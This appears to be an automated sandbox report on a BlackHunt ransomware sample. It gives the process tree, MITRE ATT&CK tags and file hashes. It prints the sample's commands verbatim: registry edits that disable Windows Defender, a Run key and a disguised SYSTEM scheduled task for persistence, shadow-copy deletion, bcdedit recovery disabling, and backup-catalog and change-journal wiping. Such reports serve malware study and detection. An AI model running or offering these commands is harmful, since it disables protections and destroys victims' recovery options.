C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:1948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1292
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1344
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1544
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe" /F2⤵PID:928
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\74b398677cff97362c190dcff860e562cdf0c647d7b215128906d6e09ff1ada7.exe" /F3⤵
- Creates scheduled task(s)
PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1512
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1956
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:992
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2212
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2320
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2156
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1092
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2532
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1728
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1472
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3592
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3832
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5801c7f54997d59e09c36bf65db456f89
SHA1c8f54813a695af1600523ac417d96a4c14c5a028
SHA2564252c8f070276e00ff658c1d20632ff00f87a21f6a2a29ab0334cdda39c2e379
SHA51212f1b00cc5eafe3f8959c30f9df21072a5ac307f6344da6867cd63254a238598d8635633ee1ac5e7ff267502fa1ed043284f2f2e1b4e4092862be693956217a2
-
Filesize
684B
MD5d6d7bbbd248f9c933ca8db694c8d750f
SHA108c3abc2e2171f4afa25c071d518f585778184c2
SHA2565143e1d597a37a6b5eb5f6b4d9bdddddf661d5262b6fd7cca27e0628bf563608
SHA5121a2e999b58910f3b1fbd035c6467ae364040b74babd0dcc7f409b1bdc8d23eb1bcab8f8d5d96af79c526f407c79bba6d2faac313736eeacc660e3e0662a5a65c
-
Filesize
12KB
MD5ed1060e7881fbb6be293f167d4880988
SHA115876eb594222fe0c3f1aef29e99d036f75632e7
SHA25693b931c8e9a459f9873424580df21b6f5c6520a354ece67c47b5b0fb783ba7e7
SHA5126038417429ea43ea526c3617ce4fd633d9d22afb05dc7bcaca6ec5bdeedd2d3ed21a239d5885a056b5df8e5db9083e1268a3116d3a8f04c6d7ed1a5954499ec5